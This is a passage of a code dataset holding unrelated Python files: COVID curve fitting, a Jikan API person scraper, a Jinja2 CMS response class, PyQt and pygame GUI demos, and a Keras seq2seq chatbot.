get_state_model(s, date, tp):\n df = get_state_data(s, date)\n fit = get_state_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_state_options(date):\n global population_state\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = df.groupby('Province_State').sum()\n tmp = tmp.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False) > 100\n states = tmp2.loc[tmp2].index.values\n min_dates = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n population_state = {**population_state, **df2.groupby('Province_State')['Population'].sum().to_dict()}\n return states, min_dates, population_state\n\n\ndef get_county_data(s, county, date):\n df = get_us_data(date)\n df2 = get_us_data2(date)\n tmp = pd.concat([df[(df['Province_State'] == s) & (df['Admin2'] == county)].iloc[0, 11:],\n df2[(df2['Province_State'] == s) & (df2['Admin2'] == county)].iloc[0, 11:]], axis=1)\n tmp.columns = ['Cases', 'Deaths']\n population_county[', '.join([county, s])] = tmp.iloc[-1, 1]\n return tmp.iloc[:-1].apply(pd.to_numeric).reset_index()\n\n\ndef get_county_fit(df, tp):\n x, y = df.index.values, df[tp].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n return fit\n\n\ndef get_county_model(s, county, date, tp):\n df = get_county_data(s, county, date)\n fit = get_county_fit(df, tp)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(0, complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_county_options(date):\n global population_county\n df = get_us_data(date).iloc[:, 5:]\n df2 = get_us_data2(date)\n tmp = df.groupby(['Province_State', 'Admin2']).sum()#.select_dtypes(['number'])\n tmp2 = tmp.iloc[:, -1].sort_values(ascending=False).gt(100)\n tmp2 = np.array([*tmp2.loc[tmp2].index.values])\n counties = dict()\n for s in np.unique(tmp2[:, 0]):\n counties[s] = tmp2[tmp2[:, 0] == s][:, 1].tolist()\n states = list(counties.keys())\n tmp2 = tmp.iloc[:, 5:].gt(100).T.idxmax().apply(date_to_str)\n min_dates = dict()\n for s, c in tmp2.index:\n if s not in min_dates:\n min_dates[s] = {}\n min_dates[s][c] = tmp2.loc[(s, c)]\n tmp = df2.groupby(['Province_State', 'Admin2'])['Population'].sum()\n population_county = {s: tmp.xs(s).to_dict() for s in np.unique(np.array([*tmp.index.values])[:, 0])}\n return states, counties, min_dates, population_county\n\n\ndef get_fit(df, country):\n x, y = df[df[country] > 0][country].index.values, df[df[country] > 0][country].values\n mod = StepModel(form='logistic')\n pars = mod.guess(y, x=x)\n # Give no weight\n # fit = mod.fit(y, pars, x=x)\n\n # Give weight to highest points\n # fit = mod.fit(y, pars, x=x, weights=(1 / (y + 1e-3))[::-1])\n\n # Or give weight to newest points\n fit = mod.fit(y, pars, x=x, weights=(1 / (x + 1e-3))[::-1])\n\n # Or give weight to least and highest points using sech\n # y_max = y.max()\n # coe = 10 / y_max\n # fit = mod.fit(y, pars, x=x, weights=(1 - 1/np.cosh(coe*(y - y_max / 2))))\n\n # Or give weight to least and highest points using polynomial\n # y_max = y.max()\n # fit = mod.fit(y, pars, x=x, weights=pow(y - y_max / 2, 4) / pow(y_max / 2, 4))\n return fit\n\n\ndef get_model(country, date):\n df = get_data(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef get_death_model(country, date):\n df = get_data2(date)\n fit = get_fit(df, country)\n complall = find_end_day(fit, 1)\n x0 = np.array(list(range(df[df[country] > 0].first_valid_index(), complall + 1)))\n return dict(zip(x0.tolist(), fit.eval(x=x0).astype('int64').tolist()))\n\n\ndef find_end_day(fit, percent):\n goal = int(fit.params['amplitude'].value) * percent\n i = 0\n while True:\n if fit.eval(x=i) >= goal:\n return i\n i += 1\n\n\ndef get_prediction(country, date):\n print(date)\n if date in preds:\n return preds[date][country]\n elif os.path.isfile(f\"assets/nn/preds_nn_{date}.csv\"):\n df = pd.read_csv(f\"assets/nn/preds_nn_{date}.csv\", index_col=0)\n preds[date] = df\n return df[country]\n else:\n print(\"File not created...\")\n # pred = make_prediction(df, df.index[-1] + 50)\n # return pred\n return None\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154744982","text":"import time\n\n#打印当前时分秒\ndef test_time():\n\tmyTime = time.strftime('%Y%m%d%H%M%S')\n\tmyTime1 = int(time.time()*10000)\n\t#time.time 输出的是时间戳\n\tprint(myTime)\n\tprint(myTime1)\n\n\n\n\nif __name__ == '__main__':\n\ttest_time()","sub_path":"python/work/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"294668749","text":"\nimport requests\nimport pandas as pd\nimport time\nimport logging\nfrom argparse import ArgumentParser\n\n\ndef get_range():\n parser = ArgumentParser()\n parser.add_argument('-r', '--range', type=int, dest='range',\n help=\"range\", metavar=\"Range\")\n\n args = parser.parse_args()\n\n if (args.range):\n return(args.range)\n\n return 1\n\n\ndef get_person(id):\n apiUrl = f'{base_url}/person/{i}'\n\n person = {}\n response = object()\n\n try:\n response = requests.get(apiUrl)\n response.raise_for_status()\n except requests.exceptions.Timeout:\n tries = 0\n while tries < 5 and response.status_code != 200:\n tries += 1\n response = requests.get(apiUrl)\n except requests.exceptions.ConnectionError as e:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Connection error: ' + e.strerror)\n except requests.exceptions.HTTPError as e:\n if (e.response.status_code):\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Person id=' + str(i) + ' does not exist')\n else:\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Error while retrieving ' + str(i) + ' with status code ' + str(response.status_code))\n else:\n jsonResult = response.json()\n\n person['id'] = str(jsonResult['mal_id'])\n person['name'] = jsonResult['name']\n person['given_name'] = jsonResult['given_name']\n person['family_name'] = jsonResult['family_name']\n person['alternate_names'] = jsonResult['alternate_names']\n person['birthday'] = jsonResult['birthday']\n person['member_favorites'] = str(jsonResult['member_favorites'])\n person['about'] = jsonResult['about']\n person['voice_acting_roles'] = [{'role': x['role'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name'],\n 'character_id': str(x['character']['mal_id']),\n 'character_name': x['character']['name']}\n for x in jsonResult['voice_acting_roles']]\n person['anime_staff_positions'] = [{'position': x['position'],\n 'anime_id': str(x['anime']['mal_id']),\n 'anime_name': x['anime']['name']}\n for x in jsonResult['anime_staff_positions']]\n person['published_manga'] = [{'position': x['position'],\n 'manga_id': str(x['manga']['mal_id']),\n 'manga_name': x['manga']['name']}\n for x in jsonResult['published_manga']]\n person['timestamp'] = time.strftime(\n '%Y-%m-%dT%H:%M:%SZ', time.gmtime())\n\n logging.info(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ', time.gmtime()) +\n 'Successfully retrieved: ' + jsonResult['name'] + ' id=' + str(id))\n\n return person\n\n\ndef save_to_csv(animes):\n try:\n df = pd.json_normalize(animes)\n df.to_csv(master, mode='a',\n index=False, header=False)\n except:\n logging.error(time.strftime('<%Y-%m-%dT%H:%M:%SZ> ',\n time.gmtime()) + 'Error while saving person data')\n\n\nlogging.basicConfig(filename='../../mal_person_parser.log', level=logging.INFO)\n\nbase_url = 'https://api.jikan.moe/v3'\nup_to = get_range()\n\n# Get the starting point\nmaster = '../../dataset/person.csv'\nstart = 1\ntry:\n mDf = pd.read_csv(master)\n start = int(mDf.iloc[-1, 0]) + 1\n print(f'Retrieving {up_to} items starting from {str(start)}')\nexcept pd.io.common.EmptyDataError:\n print('Person dataset is empty!')\n start = 1\nexcept IndexError:\n print('Person dataset is empty!')\n start = 1\n\npersons = []\n\ncount = 0\n\nfor i in range(start, start + up_to):\n person = get_person(i)\n if (person):\n persons.append(person)\n count = count+1\n\n time.sleep(5)\n\n if(count % 10 == 0 and count != 0):\n save_to_csv(persons)\n persons = []\n\nsave_to_csv(persons)\n","sub_path":"src/mal-scraper/getPersons.py","file_name":"getPersons.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"496717323","text":"class CMSResponse:\n\n def __init__(self, request, response):\n self.request = request\n self.response = response\n\n def html(self, content, status='200 OK'):\n return self.output(\n content,\n status\n )\n\n def js(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/javascript'\n )\n\n def css(self, content):\n return self.output(\n content,\n '200 OK',\n 'text/css'\n )\n\n def json(self, content):\n return self.output(\n content,\n '200 OK',\n 'application/json'\n )\n\n def jpg(self, filename):\n with open(filename, 'rb') as f:\n content = f.read()\n self.response('200 OK', [\n (\"Content-Type\", 'image/jpg'),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n\n def sendHTML(self, html, status='200 OK', meta={}):\n import os\n import json\n\n if self.request.get('domain_exists') and self.request.get('setting_exists'):\n with open(self.request.get('setting_json'), 'r') as f:\n setting = json.load(f)\n\n def CMS_Meta(options):\n return meta.get(options, '')\n\n def CMS_Setting(options):\n return setting.get(options, '')\n\n page_render = html\n template_path = self.request.get('theme_dir')\n if not os.path.exists(os.path.join(template_path, html)):\n from .CMSConfig import config\n template_path = config.dir_default\n\n if not os.path.exists(os.path.join(template_path, html)):\n html = '404Theme.html'\n\n from jinja2 import Environment, FileSystemLoader, select_autoescape\n jinja = Environment(\n loader=FileSystemLoader(\n template_path\n ),\n autoescape=select_autoescape(['html', 'xml']),\n enable_async=True,\n block_start_string='',\n block_end_string='',\n variable_start_string='',\n variable_end_string='',\n comment_start_string='',\n comment_end_string=''\n )\n content = jinja.get_template(html)\n content = content.render(\n CMS_Meta=CMS_Meta,\n CMS_Setting=CMS_Setting,\n page_render=page_render\n )\n return self.html(content, status)\n\n def show404(self):\n return self.sendHTML('404.html', '404 Not Found')\n\n def output(self, content, status='200 OK', type=\"text/html\"):\n content = bytes(content, encoding='utf-8') if content else b\"\\n\"\n self.response(status, [\n (\"Content-Type\", type),\n (\"Content-Length\", str(len(content)))\n ])\n return iter([content])\n","sub_path":"cmscore/CMSResponse.py","file_name":"CMSResponse.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383907088","text":"from PyQt5 import Qt\nfrom PyQt5 import QtCore,QtWidgets,QtGui\nimport sys\nimport PyQt5\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QFileDialog, QGraphicsRectItem, QGraphicsScene\nfrom PyQt5.QtGui import QPixmap, QImage\nfrom PyQt5.QtCore import QSize\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport imgui as window\nimport window2\n\n\nclass MainWindow():\n def __init__(self):\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n self.raw_image = None\n self.ui = window.Ui_MainWindow()\n self.ui.setupUi(MainWindow)\n self.action_connect()\n MainWindow.show()\n self.graph_sence = CARscene()\n sys.exit(app.exec_())\n\n\n# 信号槽绑定\n def action_connect(self):\n self.ui.action.triggered.connect(self.open_file)\n # self.ui.action_2.triggered.connect(self.save_file)\n # self.ui.action_5.triggered.connect(self.recover_img)\n #\n # # 打开摄像头\n # self.ui.action_17.triggered.connect(self.new_camera)\n #\n # # 标记人脸位置\n # self.ui.action_18.triggered.connect(self.mark_face)\n\n# 显示图片\n def show_image(self):\n img_cv = cv2.cvtColor(self.current_img, cv2.COLOR_RGB2BGR)\n img_width, img_height, a = img_cv.shape\n ratio_img = img_width/img_height\n ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n if ratio_img > ratio_scene:\n width = int(self.ui.graphicsView.width())\n height = int(self.ui.graphicsView.width() / ratio_img)\n else:\n width = int(self.ui.graphicsView.height() * ratio_img)\n height = int(self.ui.graphicsView.height())\n img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n h, w, c = img_resize.shape\n bytesPerLine = w * 3\n qimg = QImage(img_resize.data, w, h, bytesPerLine, QImage.Format_RGB888)\n self.scene = QGraphicsScene()\n pix = QPixmap(qimg)\n self.scene.addPixmap(pix)\n self.ui.graphicsView.setScene(self.scene)\n\n# # 显示灰度图像\n# def show_grayimage(self):\n# img_cv = self.gray_image\n# img_width, img_height = img_cv.shape\n# ratio_img = img_width/img_height\n# ratio_scene = self.ui.graphicsView.width()/self.ui.graphicsView.height()\n# if ratio_img > ratio_scene:\n# width = int(self.ui.graphicsView.width())\n# height = int(self.ui.graphicsView.width() / ratio_img)\n# else:\n# width = int(self.ui.graphicsView.height() * ratio_img)\n# height = int(self.ui.graphicsView.height())\n# img_resize = cv2.resize(img_cv, (height-5, width-5), interpolation=cv2.INTER_AREA)\n# h, w = img_resize.shape\n# qimg = QImage(img_resize.data, w, h, w, QImage.Format_Grayscale8)\n# self.scene = QGraphicsScene()\n# pix = QPixmap(qimg)\n# self.scene.addPixmap(pix)\n# self.ui.graphicsView.setScene(self.scene)\n\n#\n# # 显示直方图\n# def show_histogram(self):\n# if self.raw_image is None:\n# return 0\n# img = self.current_img\n# plt.figure(figsize=((self.ui.tab_3.width()-10)/100, (self.ui.tab_3.width()-60)/100), frameon=False)\n# plt.hist(img.ravel(), bins=256, range=[0, 256])\n# plt.axes().get_yaxis().set_visible(False)\n# # plt.axes().get_xaxis().set_visible(False)\n# ax = plt.axes()\n# # 隐藏坐标系的外围框线\n# for spine in ax.spines.values():\n# spine.set_visible(False)\n# plt.savefig('Hist.png', bbox_inches=\"tight\", transparent=True, dpi=100)\n# pix = QPixmap(\"Hist.png\")\n# self.ui.label.setPixmap(pix)\n# self.ui.label_2.setPixmap(pix)\n# self.ui.label_3.setPixmap(pix)\n\n\n\n# 打开图片\n def open_file(self):\n fname = QFileDialog.getOpenFileName(None, '打开文件', './', (\"Images (*.png *.xpm *.jpg)\"))\n if fname[0]:\n img_cv = cv2.imdecode(np.fromfile(fname[0], dtype=np.uint8), -1) # 注意这里读取的是RGB空间的\n self.raw_image = img_cv\n self.last_image = img_cv\n self.current_img = img_cv\n self.show_image()\n self.imgskin = np.zeros(self.raw_image.shape)\n\n# # 恢复图片\n# def recover_img(self):\n# self.current_img = self.raw_image\n# self.show_image()\n# self.show_histogram()\n# self.intial_value()\n#\n# # 饱和度\n# def change_saturation(self):\n# if self.raw_image is None:\n# return 0\n#\n# value = self.ui.horizontalSlider.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 2:\n# img_hsv[:, :, 2] = np.log(img_hsv[:, :, 2] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 2] = np.uint8(img_hsv[:, :, 2] / np.log(- value + np.e))\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 明度调节\n# def change_darker(self):\n# if self.raw_image is None:\n# return 0\n# value = self.ui.horizontalSlider_4.value()\n# img_hsv = cv2.cvtColor(self.current_img, cv2.COLOR_BGR2HLS)\n# if value > 3:\n# img_hsv[:, :, 1] = np.log(img_hsv[:, :, 1] /255* (value - 1)+1) / np.log(value + 1) * 255\n# if value < 0:\n# img_hsv[:, :, 1] = np.uint8(img_hsv[:, :, 1] / np.log(- value + np.e))\n# self.last_image = self.current_img\n# self.current_img = cv2.cvtColor(img_hsv, cv2.COLOR_HLS2BGR)\n\n# 人脸识别\n def detect_face(self):\n img = self.raw_image\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n return faces\nclass CARscene(QtWidgets.QGraphicsScene):\n def __init__(self, parent=None):\n super(CARscene, self).__init__(parent)\n def mousePressEvent(self, QMouseEvent):\n print(\"??\")\n #这行代码是期望显示坐标,奈何永远都是[0.0, 0.0]\n print(QMouseEvent.globalPos())\n\nif __name__ == \"__main__\":\n MainWindow()\n","sub_path":"src/com.ce/img-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117376912","text":"import pygame\n\nsize = width, height = 400, 300\nscreen = pygame.display.set_mode(size)\nclock = pygame.time.Clock()\n\nrunning = True\nx1, y1 = 0, 0\ndrawing = False # режим рисования выключен\nr = 0\nv = 10\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n screen.fill(pygame.Color('blue'))\n x1, y1 = event.pos\n r = 0\n pygame.draw.circle(screen, (255, 255, 0), event.pos, int(r))\n if drawing:\n pygame.draw.circle(screen, (255, 255, 0), (x1, y1), int(r))\n pygame.display.flip()\n r += v * clock.tick() / 1000\n screen.fill(pygame.Color('blue'))\npygame.quit()","sub_path":"PyGame2/Yellow_ball.py","file_name":"Yellow_ball.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525807433","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom user import Ui_USER\nfrom admin import Ui_Dialog1\nclass Ui_main(object):\n def openwindow(self,event):\n self.window= QtWidgets.QDialog()\n self.ui=Ui_USER()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def openwindowadmin(self,event):\n self.window = QtWidgets.QDialog()\n self.ui=Ui_Dialog1()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def setupUi(self, main):\n main.setObjectName(\"main\")\n main.setWindowModality(QtCore.Qt.NonModal)\n main.setEnabled(True)\n main.resize(1188, 631)\n main.setMinimumSize(QtCore.QSize(1188, 631))\n main.setMaximumSize(QtCore.QSize(1188, 631))\n font = QtGui.QFont()\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n main.setFont(font)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"E:/project/icon.jpg\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n main.setWindowIcon(icon)\n main.setWindowOpacity(1.0)\n main.setStyleSheet(\"background-image: url(:/newPrefix/imageedit_8_7961532127.jpg);\")\n main.setSizeGripEnabled(False)\n main.setModal(False)\n self.label = QtWidgets.QLabel(main)\n self.label.setGeometry(QtCore.QRect(170, 490, 171, 41))\n self.label.setStyleSheet(\"background: transparent;\\n\"\n\"font: 75 12pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(85, 0, 127);\")\n self.label.setObjectName(\"label\")\n self.label.mousePressEvent=self.openwindowadmin\n self.label_2 = QtWidgets.QLabel(main)\n self.label_2.setGeometry(QtCore.QRect(360, 410, 131, 31))\n self.label_2.setStyleSheet(\"background:transparent;\\n\"\n\"font: 14pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(0, 0, 127)\")\n self.label_2.setObjectName(\"label_2\")\n self.label_2.mousePressEvent = self.openwindow\n\n self.retranslateUi(main)\n QtCore.QMetaObject.connectSlotsByName(main)\n\n def retranslateUi(self, main):\n _translate = QtCore.QCoreApplication.translate\n main.setWindowTitle(_translate(\"main\", \"QWIKLY\"))\n self.label.setText(_translate(\"main\", \"ADMINISTRATOR\"))\n self.label_2.setText(_translate(\"main\", \" USER\"))\nimport xx_rc\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n main = QtWidgets.QDialog()\n ui = Ui_main()\n ui.setupUi(main)\n main.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601207099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers, losses, metrics\nfrom tensorflow.keras import preprocessing\n\nimport numpy as np\nimport pandas as pd\n\nimport os\nimport re\nimport pickle\n\nfrom konlpy.tag import Okt\n\nclass seq2seq:\n def __init__(self):\n # 태그 단어\n self.PAD = \"\" # 패딩\n self.STA = \"\" # 시작\n self.END = \"\" # 끝\n self.OOV = \"\" # 없는 단어(Out of Vocabulary)\n\n # 태그 인덱스\n self.PAD_INDEX = 0\n self.STA_INDEX = 1\n self.END_INDEX = 2\n self.OOV_INDEX = 3\n\n # 데이터 타입\n self.ENCODER_INPUT = 0\n self.DECODER_INPUT = 1\n self.DECODER_TARGET = 2\n\n # 한 문장에서 단어 시퀀스의 최대 개수\n self.max_sequences = 30\n\n # 임베딩 벡터 차원\n self.embedding_dim = 100\n\n # LSTM 히든레이어 차원\n self.lstm_hidden_dim = 128\n\n # 정규 표현식 필터\n self.RE_FILTER = re.compile(\"[.,!?\\\"':;~()]\")\n\n #학습시 생성한 word_index vocab호출\n with open('./seq2seq/vocab_dict/index_to_word_final.pickle', 'rb') as f:\n self.index_to_word = pickle.load(f)\n\n with open('./seq2seq/vocab_dict/word_to_index_final.pickle', 'rb') as f:\n self.word_to_index = pickle.load(f)\n \n #--------------------------------------------\n # 훈련 모델 인코더 정의\n #--------------------------------------------\n # 입력 문장의 인덱스 시퀀스를 입력���로 받음\n encoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n encoder_outputs = layers.Embedding(len(self.index_to_word), self.embedding_dim)(encoder_inputs)\n # return_state가 True면 상태값 리턴\n # LSTM은 state_h(hidden state)와 state_c(cell state) 2개의 상태 존재\n encoder_outputs, state_h, state_c = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True)(encoder_outputs)\n # 히든 상태와 셀 상태를 하나로 묶음\n encoder_states = [state_h, state_c]\n #--------------------------------------------\n # 훈련 모델 디코더 정의\n #--------------------------------------------\n # 목표 문장의 인덱스 시퀀스를 입력으로 받음\n decoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n decoder_embedding = layers.Embedding(len(self.index_to_word), self.embedding_dim)\n decoder_outputs = decoder_embedding(decoder_inputs)\n # 인코더와 달리 return_sequences를 True로 설정하여 모든 타임 스텝 출력값 리턴\n # 모든 타임 스텝의 출력값들을 다음 레이어의 Dense()로 처리하기 위함\n decoder_lstm = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True,\n return_sequences=True)\n\n # initial_state를 인코더의 상태로 초기화\n decoder_outputs, _, _ = decoder_lstm(decoder_outputs,\n initial_state=encoder_states)\n\n # 단어의 개수만큼 노드의 개수를 설정하여 원핫 형식으로 각 단어 인덱스를 출력\n decoder_dense = layers.Dense(len(self.index_to_word), activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n\n\n\n #--------------------------------------------\n # 훈련 모델 정의\n #--------------------------------------------\n\n # 입력과 출력으로 함수형 API 모델 생성\n model = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n # 학습 방법 설정\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n #--------------------------------------------\n # 예측 모델 인코더 정의\n #--------------------------------------------\n\n # 훈련 모델의 인코더 상태를 사용하여 예측 모델 인코더 설정\n encoder_model = models.Model(encoder_inputs, encoder_states)\n\n\n\n #--------------------------------------------\n # 예측 모델 디코더 정의\n #--------------------------------------------\n\n # 예측시에는 훈련시와 달리 타임 스텝을 한 단계씩 수행\n # 매번 이전 디코더 상태를 입력으로 받아서 새로 설정\n decoder_state_input_h = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_state_input_c = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c] \n\n # 임베딩 레이어\n decoder_outputs = decoder_embedding(decoder_inputs)\n\n # LSTM 레이어\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_outputs,\n initial_state=decoder_states_inputs)\n\n # 히든 상태와 셀 상태를 하나로 묶음\n decoder_states = [state_h, state_c]\n\n # Dense 레이어를 통해 원핫 형식으로 각 단어 인덱스를 출력\n decoder_outputs = decoder_dense(decoder_outputs)\n\n # 예측 모델 디코더 설정\n decoder_model = models.Model([decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n \n self.model = model\n self.encoder_model = encoder_model\n self.decoder_model = decoder_model\n\n #가중치 불러오기\n self.model.load_weights('./seq2seq/seq2seq_model/seq2seq2_model_weights')\n self.encoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_encoder_model_weights')\n self.decoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_decoder_model_weights')\n print(self.model.summary())\n \n # 형태소분석 함수\n def pos_tag(self, sentences):\n \n # KoNLPy 형태소분석기 설정\n tagger = Okt()\n \n # 문장 품사 변수 초기화\n sentences_pos = []\n \n # 모든 문장 반복\n for sentence in sentences:\n # 특수기호 제거\n sentence = re.sub(self.RE_FILTER, \"\", sentence)\n #print(sentence)\n # 배열인 형태소분석의 출력을 띄어쓰기로 구분하여 붙임\n sentence = \" \".join(tagger.morphs(sentence))\n sentences_pos.append(sentence)\n \n return sentences_pos\n\n def make_predict_input(self, sentence):\n\n sentences = []\n sentences.append(sentence)\n sentences = self.pos_tag(sentences)\n input_seq = self.convert_text_to_index(sentences, self.word_to_index, self.ENCODER_INPUT)\n \n return input_seq\n\n # 인덱스를 문장으로 변환\n def convert_index_to_text(self, indexs, vocabulary): \n \n sentence = ''\n \n # 모든 문장에 대해서 반복\n for index in indexs:\n if index == self.END_INDEX:\n # 종료 인덱스면 중지\n break;\n if vocabulary.get(index) is not None:\n # 사전에 있는 인덱스면 해당 단어를 추가\n sentence += vocabulary[index]\n else:\n # 사전에 없는 인덱스면 OOV 단어를 추가\n sentence.extend([vocabulary[self.OOV_INDEX]])\n \n # 빈칸 추가\n sentence += ' '\n\n return sentence\n\n \n # 문장을 인덱스로 변환\n def convert_text_to_index(self, sentences, vocabulary, type): \n \n sentences_index = []\n \n # 모든 문장에 대해서 반복\n for sentence in sentences:\n sentence_index = []\n \n # 디코더 입력일 경우 맨 앞에 START 태그 추가\n if type == self.DECODER_INPUT:\n sentence_index.extend([vocabulary[self.STA]])\n \n # 문장의 단어들을 띄어쓰기로 분리\n for word in sentence.split():\n if vocabulary.get(word) is not None:\n # 사전에 있는 단어면 해당 인덱스를 추가\n sentence_index.extend([vocabulary[word]])\n else:\n # 사전에 없는 단어면 OOV 인덱스를 추가\n sentence_index.extend([vocabulary[self.OOV]])\n\n # 최대 길이 검사\n if type == self.DECODER_TARGET:\n # 디코더 목표일 경우 맨 뒤에 END 태그 추가\n if len(sentence_index) >= self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences-1] + [vocabulary[self.END]]\n else:\n sentence_index += [vocabulary[self.END]]\n else:\n if len(sentence_index) > self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences]\n \n # 최대 길이에 없는 공간은 패딩 인덱스로 채움\n sentence_index += (self.max_sequences - len(sentence_index)) * [vocabulary[self.PAD]]\n \n # 문장의 인덱스 배열을 추가\n sentences_index.append(sentence_index)\n\n return np.asarray(sentences_index)\n\n\n # 텍스트 생성\n def generate_text(self, input_seq):\n \n # 입력을 인코더에 넣어 마지막 상태 구함\n states = self.encoder_model.predict(input_seq)\n\n # 목표 시퀀스 초기화\n target_seq = np.zeros((1, 1))\n \n # 목표 시퀀스의 첫 번째에 태그 추가\n target_seq[0, 0] = self.STA_INDEX\n \n # 인덱스 초기화\n indexs = []\n \n # 디코더 타임 스텝 반복\n while 1:\n # 디코더로 현재 타임 스텝 출력 구함\n # 처음에는 인코더 상태를, 다음부터 이전 디코더 상태로 초기화\n decoder_outputs, state_h, state_c = self.decoder_model.predict(\n [target_seq] + states)\n\n # 결과의 원핫인코딩 형식을 인덱스로 변환\n index = np.argmax(decoder_outputs[0, 0, :])\n indexs.append(index)\n \n # 종료 검사\n if index == self.END_INDEX or len(indexs) >= self.max_sequences:\n break\n\n # 목표 시퀀스를 바로 이전의 출력으로 설정\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = index\n \n # 디코더의 이전 상태를 다음 디코더 예측에 사용\n states = [state_h, state_c]\n\n # 인덱스를 문장으로 변환\n sentence = self.convert_index_to_text(indexs, self.index_to_word)\n to_matching = sentence.split(' ')\n to_matching = to_matching[:-1]\n chatbot_data = pd.read_csv('./seq2seq/ChatbotData_Cindy.csv', encoding='utf-8')\n try:\n for_matching = list(chatbot_data[chatbot_data.A.apply(lambda sentence1: all(word in sentence1 for word in to_matching))]['A'])\n return_sentence = for_matching[0]\n except IndexError:\n return_sentence = sentence\n return return_sentence\n \n\n def get_answer(self, text):\n input_seq = self.make_predict_input(text)\n return self.generate_text(input_seq)\n\n \n\n\n\n\n","sub_path":"Cindy_project/seq2seq/Seq2Seq_model_class.py","file_name":"Seq2Seq_model_class.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"403456200","text":"#!/usr/bin/env python\n\"\"\"\n文件读、写,的步骤:\n 